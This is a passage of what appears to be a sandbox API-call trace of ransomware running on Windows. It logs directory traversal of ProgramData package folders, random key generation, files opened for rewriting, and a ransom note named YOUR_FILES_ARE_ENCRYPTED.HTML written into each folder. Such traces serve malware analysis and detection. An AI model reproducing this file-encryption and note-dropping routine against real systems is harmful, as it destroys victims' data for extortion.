lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.373] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508") returned 83 [0109.373] GetProcessHeap () returned 0x600000 [0109.373] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0109.374] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508" [0109.374] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\*" [0109.374] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ea95f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69eaf8db, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0109.374] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ea95f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69eaf8db, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0109.374] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69eaf8db, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0109.374] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.374] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages") returned 92 [0109.374] GetProcessHeap () returned 0x600000 [0109.374] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.375] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages" [0109.376] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\*" [0109.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69eaf8db, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f14d8, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.376] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69eaf8db, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f14d8, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0109.376] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ebf6f7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ebf6f7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f14d8, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0109.376] StrStrIW (lpFirst="vcRuntimeMinimum_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.376] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64") returned 115 [0109.376] GetProcessHeap () returned 0x600000 [0109.376] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0109.377] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64" [0109.377] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\*" [0109.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ebf6f7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ebf6f7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0109.377] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ebf6f7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ebf6f7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0109.377] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9153a800, ftCreationTime.dwHighDateTime=0x1d5c5bc, ftLastAccessTime.dwLowDateTime=0x9153a800, ftLastAccessTime.dwHighDateTime=0x1d5c5bc, ftLastWriteTime.dwLowDateTime=0x9153a800, ftLastWriteTime.dwHighDateTime=0x1d5c5bc, nFileSizeHigh=0x0, nFileSizeLow=0x1704ac, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0109.377] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.377] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 124 [0109.377] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0109.377] lstrlenW (lpString=".cab") returned 4 [0109.377] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0109.377] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{eea66967-97e2-4561-a999-5c22e3cde428}v14.25.28508\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0109.378] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=1508524) returned 1 [0109.378] GetProcessHeap () returned 0x600000 [0109.378] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0109.381] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="8C") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="2C") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="B4") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="E0") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="B6") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="FE") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="FA") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="C3") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="BB") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="17") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="84") returned 2 [0109.381] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="C0") returned 2 [0109.381] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="17") returned 2 [0109.381] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="E1") returned 2 [0109.381] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="37") returned 2 [0109.381] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="3E") returned 2 [0109.381] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="18") returned 2 [0109.381] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="DB") returned 2 [0109.381] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="85") returned 2 [0109.381] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="BB") returned 2 [0109.381] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="92") returned 2 [0109.381] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="14") returned 2 [0109.382] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="C7") returned 2 [0109.382] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="00") returned 2 [0109.382] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="DF") returned 2 [0109.382] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="C9") returned 2 [0109.382] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="78") returned 2 [0109.382] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="26") returned 2 [0109.382] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="C9") returned 2 [0109.382] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="F4") returned 2 [0109.382] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="E4") returned 2 [0109.382] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="0E") returned 2 [0109.382] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0109.382] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0109.382] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0109.382] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbd4500, ftCreationTime.dwHighDateTime=0x1d5c5bc, ftLastAccessTime.dwLowDateTime=0xcbbd4500, ftLastAccessTime.dwHighDateTime=0x1d5c5bc, ftLastWriteTime.dwLowDateTime=0xcbbd4500, ftLastWriteTime.dwHighDateTime=0x1d5c5bc, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0109.382] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.382] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 141 [0109.382] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0109.382] lstrlenW (lpString=".msi") returned 4 [0109.382] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0109.383] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbd4500, ftCreationTime.dwHighDateTime=0x1d5c5bc, ftLastAccessTime.dwLowDateTime=0xcbbd4500, ftLastAccessTime.dwHighDateTime=0x1d5c5bc, ftLastWriteTime.dwLowDateTime=0xcbbd4500, ftLastWriteTime.dwHighDateTime=0x1d5c5bc, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0109.383] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0109.383] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0109.383] GetProcessHeap () returned 0x600000 [0109.383] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0109.383] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{eea66967-97e2-4561-a999-5c22e3cde428}v14.25.28508\\packages\\vcruntimeminimum_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0109.386] WriteFile (in: hFile=0x308, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0109.387] CloseHandle (hObject=0x308) returned 1 [0109.388] GetProcessHeap () returned 0x600000 [0109.388] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0109.388] GetProcessHeap () returned 0x600000 [0109.388] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.389] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ebf6f7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ebf6f7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f14d8, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0109.389] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.449] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0109.449] GetProcessHeap () returned 0x600000 [0109.449] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0109.450] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{eea66967-97e2-4561-a999-5c22e3cde428}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0109.450] WriteFile (in: hFile=0x30c, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0109.451] CloseHandle (hObject=0x30c) returned 1 [0109.452] GetProcessHeap () returned 0x600000 [0109.452] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.452] GetProcessHeap () returned 0x600000 [0109.452] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.453] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69eaf8db, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69eaf8db, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0109.453] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0109.453] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0109.454] GetProcessHeap () returned 0x600000 [0109.454] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x313b008 [0109.454] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{eea66967-97e2-4561-a999-5c22e3cde428}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0109.455] WriteFile (in: hFile=0x314, lpBuffer=0x313b008*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x313b008*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0109.456] CloseHandle (hObject=0x314) returned 1 [0109.457] GetProcessHeap () returned 0x600000 [0109.457] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.457] GetProcessHeap () returned 0x600000 [0109.457] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0109.459] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0109.459] StrStrIW (lpFirst="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.459] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 82 [0109.459] GetProcessHeap () returned 0x600000 [0109.459] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.461] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0109.461] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*" [0109.461] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.461] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0109.461] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0109.461] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.461] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 